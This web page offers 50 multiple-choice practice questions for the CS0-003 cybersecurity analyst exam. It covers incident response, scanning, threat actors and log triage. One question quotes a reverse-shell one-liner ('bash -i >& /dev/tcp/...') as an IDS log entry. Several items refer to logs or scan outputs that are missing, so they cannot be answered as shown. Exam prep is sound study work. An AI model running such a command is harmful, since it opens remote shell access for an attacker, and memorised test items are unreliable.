CS0-003 Exam Prep Free – 50 Practice Questions to Get You Ready for Exam Day
Getting ready for the CS0-003 certification? Our CS0-003 Exam Prep Free resource includes 50 exam-style questions designed to help you practice effectively and feel confident on test day.
Effective, free CS0-003 exam prep is the key to success. With our free practice questions, you can:
- Get familiar with exam format and question style
- Identify which topics you’ve mastered—and which need more review
- Boost your confidence and reduce exam anxiety
Below, you will find 50 realistic CS0-003 Exam Prep Free questions that cover key exam topics. These questions are designed to reflect the structure and challenge level of the actual exam, making them perfect for your study routine.
Which of the following does "federation" most likely refer to within the context of identity and access management?
A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user
D. Correlating one’s identity with the attributes and associated applications the user has access to
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?
A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution
The management team requests monthly KPI reports on the company’s cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?
A. Employee turnover
B. Intrusion attempts
C. Mean time to detect
D. Level of preparedness
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?
A. The NTP server is not configured on the host
B. The cybersecurity analyst is looking at the wrong information
C. The firewall is using UTC time
D. The host with the logs is offline
Which of the following risk management principles is accomplished by purchasing cyber insurance?
A. Accept
B. Avoid
C. Mitigate
D. Transfer
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?
A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info"; }
B. function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1) && echo "$1 | $info"; }
D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.
A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?
A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan
A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?
A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
A. Implementing multifactor authentication on the server OS
B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboarding process
D. All new employees must sign a user agreement to acknowledge the company security policy
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?
A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
A security analyst identified the following suspicious entry in the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm whether the activity is ongoing?
A. #!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"
B. #!/bin/bash
ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"
D. #!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings?
A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. Disk contents
B. Backup data
C. Temporary files
D. Running processes
A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules
B. Deploy an IPS in the perimeter network
C. Roll out a CDN
D. Implement a load balancer
During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?
A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.
Which of the following describes the best reason for conducting a root cause analysis?
A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.
A cybersecurity analyst is recording the following details:
• ID
• Name
• Description
• Classification of information
• Responsible party
In which of the following documents is the analyst recording this information?
A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan
A vulnerability scanner generates the following output: The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?
A. Oracle JDK
B. Cisco Webex
C. Redis Server
D. SSL Self-signed Certificate
Which of the following best describes the key elements of a successful information security program?
A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset classification
C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan
The analyst reviews the following endpoint log entry: Which of the following has occurred?
A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation
Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?
A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of the following best fits the type of scanning activity requested?
A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed: Which of the following tuning recommendations should the security analyst share?
A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header
A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?
A. Perform non-credentialed scans
B. Ignore embedded web server ports
C. Create a tailored scan for the printer subnet
D. Increase the threshold length of the scan timeout
A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
A. Eradication
B. Isolation
C. Reporting
D. Forensic analysis
A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below: Which of the following has most likely occurred?
A. An Office document with a malicious macro was opened.
B. A credential-stealing website was visited.
C. A phishing link in an email was clicked.
D. A web browser vulnerability was exploited.
Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?
A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes
A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
• Must use minimal network bandwidth
• Must use minimal host resources
• Must provide accurate, near real-time updates
• Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?
A. Internal
B. Agent
C. Active
D. Uncredentialed
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
• DNS traffic while a tunneling session is active.
• The mean time between queries is less than one second.
• The average query length exceeds 100 characters.
Which of the following attacks most likely occurred?
A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?
A. PowerShell
B. Ruby
C. Python
D. Shell script
A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output: Which of the following hosts should be patched first, based on the metrics?
A. host01
B. host02
C. host03
D. host04
An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?
A. Creating a playbook denoting specific SLAs and containment actions per incident type
B. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs
C. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders
D. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks
While reviewing web server logs, a security analyst found the following line: Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII
A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?
A. XDR logs
B. Firewall logs
C. IDS logs
D. MFA logs
We continuously update our content to ensure you have the most current and effective prep materials.
Good luck with your CS0-003 certification journey!